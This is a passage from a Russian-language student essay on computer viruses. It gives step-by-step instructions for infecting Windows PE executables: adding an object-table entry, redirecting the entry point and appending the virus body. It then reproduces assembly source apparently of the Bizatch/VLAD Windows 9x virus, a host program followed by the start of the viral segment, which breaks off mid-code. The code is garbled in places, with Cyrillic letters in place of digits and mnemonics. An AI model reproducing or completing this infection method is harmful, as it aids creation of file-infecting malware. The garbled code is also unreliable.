Реферат: Компьютерные вирусы
HMODULE hModule, // описатель DLL-модуля
LPCSTR lpszProc // имя функции
);
На первый взгляд кажется, что достаточно лишь сохранить в стеке описатель DLL-модуля (он стоит перед указателем на имя функции) и вызвать API. Но это не так. Параметры, согласно Pascal Calling Convention, должны быть сохранены в стеке в обратном порядке:
Push offset lpszProc
Push dword ptr [hModule]
Call GetProcAddress
Используя 32-битный отладчик, можно оттрасировать вызов и найти вызов KERNEL32.DLL для каждого конкретного случая. Это позволит получить номер функции и обойтись без необходимой для вызова таблицы импортируемых имен.
Заражение файлов формата PE – execuatable.
Определение положения начала РЕ – заголовка происходит аналогично поиску начала NE – заголовка. Если смещение таблицы настройки адресов (поле 18h) в заголовке ЕХЕ – файла 40h или больше, то по смещению 3Ch находится смещение PE – execuatable заголовка. Сигнатура PE – execuatable («РЕ») находится, как и у NE – execuatable ЕХЕ – файла, в начале нового заголовка.
Внутри PE – заголовка находится таблица объектов. Ее формат наиболее важен по сравнению с прочими. Для добавления вирусного кода в носитель и перехвата вирусом управления необходимо добавить элемент в таблицу объектов.
Основные действия заражения PE – execuatable файла:
1. Найти смещение заголовка PE – execuatable в файле.
2. Считать достаточное количество информации из заголовка для вычисления его полного размера.
3. Считать весь PE – заголовок и таблицу объектов.
4. Добавить новый объект в таблицу объектов.
5. Установить точку входа RVA на новый объект.
6. Дописать вирус к файлу по вычисленному физическому смещению.
7. Записать измененный РЕ – заголовок в файл.
Для определения расположения таблицы объектов следует воспользоваться значением переменной «HeaderSize» (не путать с «NT headersize»), которая содержит совместный размер заголовков DOS, PE и таблицы объектов.
Для чтения таблицы объектов необходимо считать HeaderSize байт от начала файла.
Таблица объектов расположена непосредственно за NT – заголовком. Значение «NTheadersize» показывает количество байт, следующих за полем «flags». Итак, для определения смещения таблицы объектов нужно получить NТheadersize и добавить размер поля флагов (24).
Добавление объекта: получив количество объектов, умножить его на 40 (размер элемента таблицы объектов). Таким образом определяется смещение, по которому будет расположен вирус.
Данные для элемента таблицы объектов должны быть вычислены с использованием информации в предыдущем элементе (элементе носителя).
RVA=((prev RVA+ prev Virtual Size)/OBJ Alignment+1)
*OBJ Alignment
Virtual Size=((size of virus+buffer any space)/OBJ Alignment+1)
*OBJ Alignment
Physical Size=(size of virus/File Alignment+1)*File Alignment
Physical Offset=prev Physical Offset+prev Physical Size
Object Flags=db 40h,0,0,C0h
Entrypoint RVA=RVA
Теперь необходимо увеличить на единицу поле «количество объектов» и записать код вируса по вычисленному «физическому смещению» в размере физического размера байт.
Пример вируса под Windows 9x.
.386
locals
jumps
.model flat,STDCALL
include win32.inc ;некоторые 32-битные константы и структуры
L equ <LARGE>
;Определим внешние функции, к которым будет подключаться вирус
extrn BeginPaint:PROC
extrn CreateWindowExA:PROC
extrn DefWindowProcA:PROC
extrn DispatchMessageA:PROC
extrn EndPaint:PROC
extrn ExitProcess:PROC
extrn FindWindowA:PROC
extrn GetMessageA:PROC
extrn GetModuleHandleA:PROC
extrn GetStockObject:PROC
extrn InvalidateRect:PROC
extrn LoadCursorA:PROC
extrn LoadIconA:PROC
extrn MessageBeep:PROC
extrn PostQuitMessage:PROC
extrn RegisterClassA:PROC
extrn ShowWindow:PROC
extrn SetWindowPos:PROC
extrn TextOutA:PROC
extrn TranslateMessage:PROC
extrn UpdateWindow:PROC
;Для поддержки Unicode Win32 интерпретирует некоторые функции
;для ANSI или расширенного набора символов.
;В качестве примера рассмотрим ANSI
CreateWindowEx equ <CreateWindowExA>
DefWindowProc equ <DefWindowProcA>
DispatchMessage equ <DispatchMessageA>
FindWindow equ <FindWindowA>
GetMessage equ <GetMessageA>
GetModuleHandle equ <GetModuleHandleA>
LoadCursor equ <LoadCursorA>
LoadIcon equ <LoadIconA>
MessageBox equ <MessageBoxA>
RegisterClass equ <RegisterClassA>
TextOut equ <TextOutA>
.data
newhwnd dd 0
lppaint PAINTSTRUCT <?>
msg MSGSTRUCT <?>
wc WNDCLASS <?>
mbx_count dd 0
hInst dd 0
szTitleName db "Bizatch by Quantum / VLAD activated"
zero db 0
szAlternate db "more than once",0
szClassName db "ASMCLASS32",0
;Сообщение выводимое в окне
szPaint db "Left button pressed:"
s_num db "00000000h times.",0
;Размер сообщения
MSG_L EQU ($-offset szPaint)-1
.code
;Сюда обычно передается управление от загрузчика.
start:
;Получим HMODULE
push L 0
call GetModuleHandle
mov [hInst],eax
push L 0
push offset szClassName
call FindWindow
or eax,eax
jz reg_class
;Пространство для модификации строки заголовка
mov [zero]," "
reg_class:
;Инициализируем структуру WndClass
mov [wc.clsStyle],CS_HREDRAW+CS_VREDRAW+CS_GLOBALCLASS
mov [wc.clsLpfnWndProc],offset WndProc
mov [wc.clsCbClsExtra],0
mov [wc.clsCbWndExtra],0
mov eax,[hInst]
mov [wc.clsHInstance],eax
;Загружаем значок
push L IDI_APPLICATION
push L 0
call LoadIcon
mov [wc.clsHIcon],eax
;Загружаем курсор
push L IDC_ARROW
push L 0
call LoadCursor
mov [wc.clsHCursor],eax
;Инициализируем оставшиеся поля структуры WndClass
mov [wc.clsHbrBackground],COLOR_WINDOW+1
mov dword ptr [wc.clsLpszMenuName],0
mov dword ptr [wc.clsLpszClassName],offset szClassName
;Регистрирем класс окна
push offset wc
call RegisterClass
;Создаем окно
push L 0 ;lpParam
push [hInst] ;hInstance
push L 0 ;Меню
push L 0 ;hwnd родительского окна
push L CW_USEDEFAULT ;Высота
push L CW_USEDEFAULT ;Длина
push L CW_USEDEFAULT ;Y
push L CW_USEDEFAULT ;X
push L WS_OVERLAPEEDWINDOW ;Style
push offset szTitleName ;Title Style
push offset szClassName ;Class Name
push L 0 ;extra style
call CreateWindowEx
;Сохраняем HWND
mov [newhwnd],eax
;Отображаем окно на экране
push L SW_SHOWNORMAL
push [newhwnd]
call ShowWindow
;Обновляем содержимое окна
push [newhwnd]
call UpdateWindow
;Очередь сообщений
msg_loop:
;Прочитаем следующее сообщение из очереди
push L 0
push L 0
push L 0
push offset msg
call GetMessage
;Если функция GetMessage вернула нулевое значение,
;то завершаем обработку сообщений и выходим из процесса
cmp ax,0
je end_loop
;преобразуем виртуальные коды клавиш в сообщения клавиатуры
push offset msg
call TranslateMessage
;Предаем это сообщение назад в Windows
push offset msg
call DispatchMessage
;Переходим к следующему сообщению
jmp msg_loop
;Выходим из процесса
end_loop:
push [msg.msWPARAM]
call ExitProcess
;Обработка сообщений окна. Win32 требует сохранения регистров
;EBX, EDI, ESI. запишем эти регистры после "uses" в строке "proc"
;Это позволит Ассемблеру сохранить их
WndProc proc uses ebx edi esi,hwnd:DWORD, wmsg:DWORD,
wparam:DWORD, lparam:DWORD
LOCAL theDC:DWORD
;Проверим, какое сообщение получили, и перейдем к обработке
cmp [wmsg],WM_DESTROY
je wmdestroy
стр [wmsg],WM_RBUTTONDOWN
je wmrbuttondown
cmp [wmsg],WM_SIZE
je wmsize
cmp [wmsg],WM_CREATE
je wmcreate
cmp [wmsg],WM_LBUTTONDOWN
je wmlbuttondown
cmp [wmsg],WM_PAINT
je wmpaint
cmp [wmsg],WM_GETMINMAXINFO
je wmgetminmaxinfo
;Данная программа не обрабатывает это сообщение.
;Передадим его Windows,
;чтобы оно было обработано по умолчанию
jmp defwndproc
;Сообщение WM_PAINT (перерисовать содержимое окна)wmpaint:
;Подготовим окно для перерисовки
push offset Ippaint
push [hwnd]
call BeginPaint
mov [theDC], eax
;Переведем в ASCII-формат значение mbx_count, которое
;доказывает, сколько раз была нажата левая кнопка мыши
mov eax,[mbx_count]
mov edi, offset s_num
call HexWrite32
; Вывод строки в окно
push L MSG_L ;Длина строки
push offset szPaint ;Строка
push L 5 ;Y
push L 5 ;X
push [theDC] ;DC
call TextOut
;0бозначим завершение перерисовки окна
push offset Ippaint
push [hwnd]
call EndPaint
;Выходим из обработки сообщения
mov eax, 0
jmp finish
;Сообщение WM_CREATE (создание окна)
wmcreate:
; Выходим из обработки сообщения
mov eax, 0
jmp finish
;Сообщение, не обрабатываемое данной программой, передаем Windows
defwndproc:
push [Iparam]
push [wparam]
push [wmsg]
push [hwnd]
call DefWindowProc
; Выходим из обработки сообщения
jmp finish
;Сообщение WM_DESTROY (уничтожение окна)
wmdestroy:
; Закроем поток
push L О
call PostQuitMessage
;Выходим из обработки сообщения
mov eax, О
jmp finish
;Сообщение WMJ-BUTTONDOWN (нажата левая кнопка мыши)
wmlbuttondown:
inc [mbx_count]
;0бновим содержимое окна
push L 0
push L 0
push [hwnd]
call InvalidateRect
[Выходим из обработки сообщения
mov eax, О
jmp finish
;Сообщение WM_RBUTTONDOWN (нажата правая кнопка мыши)
wmrbuttondown:
push L 0
call MessageBeep
;Выходим из обработки сообщения
jmp finish
;Сообщение WM_SIZE (изменен размер окна)
wmsize:
;Выходим из обработки сообщения
mov eax, О
jmp finish
;Сообщение WM_GETMINMAXINFO (попытка изменить размер
;или положение окна)
wmgetminmaxinfo:
;Заполним структуру MINMAXINFO
mov ebx, [Iparam]
mov [(MINMAXINFO ptr. ebx).mintrackposition_x],350
mov [(MINMAXINFO ptr ebx).mintrackposition_y],60
;Выходим из обработки сообщения
mov eax, О
jmp finish
;Выходим из обработки сообщения
finish:
ret
WndProc endp
;Процедура перевода байта в ASCII-формат для печати. Значение,
;находящееся в регистре AL, будет записано в ASCII-формате
;по адресу ES-.EDI
HexWriteS proc
;Разделяем байт на полубайты и загружаем их в регистры АН и AL
mov ah,al
and al.0Fh
shr ah,4
;Добавляем 30h к каждому полубайту, чтобы регистры содержали коды
;соответствующих символов ASCII. Если число,
;записанное в полубайте, было больше 9,
;то значение в этом полубайте надо еще корректировать
or ax,3030h
;Меняем полубайты местами, чтобы регистр АН содержал младший
;полубайт, а регистр AL - старший
xchg al.ah
;Проверим, надо ли корректировать младший полубайт,
;если да - корректируем
cmp ah, 39h
ja @@4
;Проверим, надо ли корректировать старший полубайт,
;если да - корректируем
@@1:
cmp al,39h
ja @@3
;Сохраним значение по адресу ES:EDI
@@2:
stosw
ret
;Корректируем значение старшего полубайта
@@3:
sub al, 30h
add al, "A"-10
jmp @@2
;Корректируем значение младшего полубайта
@@4:
sub ah, 30h
add ah, "A"-10
jmp @@1
HexWriteS endp
; Процедура перевода слова в ASCII-формат для печати.
;Значение, находящееся в регистре АХ, будет записано
;в ASCII-формате по адресу ES:EDI
HexWrite16 proc
;Сохраним младший байт из стека
push ax
;Загрузим старший байт в регистр AL
xchg al,ah
;Переведем старший байт в ASCII-формат
call HexWriteS
;Восстановим младший байт из стека
pop ax
;Переведем младший байт в ASCII-формат
call HexWriteS
ret
HexWrite16 endp
;Процедура перевода двойного слова в ASCII-формат для печати.
;Значение, находящееся в регистре ЕАХ, будет записано
;в ASCII-формате по адресу ES:EDI
HexWrite32 proc
;Сохраним младшее слово из стека
push eax
;Загрузим старшее слово в регистр АХ
shr eax, 16
;Переведем старшее слово в ASCII-формат
call HexWrite16
;Восстановим младшее слово из стека
pop eax
;Переведем младшее слово в ASCII-формат
call HexWrite16
ret
HexWrite32 endp
;Сделаем процедуру WndProc доступной извне
public WndProc
ends
;Здесь начинается код вируса. Этот код переписывается из файла
;в файл. Все вышеописанное - всего лишь программа-носитель
vladseg segment para public "vlad"
assume cs:vladseg
vstart: *
;Вычислим текущий адрес
call recalc
recalc:
pop ebp
mov eax,ebp
db 2Dh ;Код команды SUB AX
subme dd 30000h+(recalc-vstart)
;Сохраним адрес в стеке
push eax
;Вычислим стартовый адрес вирусного кода
sub ebp,offset recalc
;Ищем KERNEL. Возьмем вторую известную нам точку KERNEL
mov eax,[ebp+offset kern2]
;Проверим ключ. Если ключа нет, перейдем к точке 1
cmp dword ptr [eax],5350FC9Ch
jnz notkern2
;KERNEL найден, точка 2
mov eax,[ebp+offset kern2]
jmp movit
;Точка 2 не подошла, проверим точку 1
notkern2:
; Возьмем адрес первой известной нам точки KERNEL
mov eax,[ebp+offset kern1]
;Проверим ключ, если ключа нет - выходим
cmp dword ptr [eax],5350FC9Ch
jnz nopayload
;KERNEL найден, точка 1
mov eax,[ebp+offset kern1]
;KERNEL найден, адрес точки входа находится в регистре EAX
movit:
;Сохраним адрес KERNEL
mov [ebp+offset kern],eax
cld
;3апомним текущую директорию
lea eax, [ebp+offset orgdir]
push eax
push 255
call GetCurDir
;Инициализируем счетчик заражений
mov byte ptr [ebp+offset countinfect],0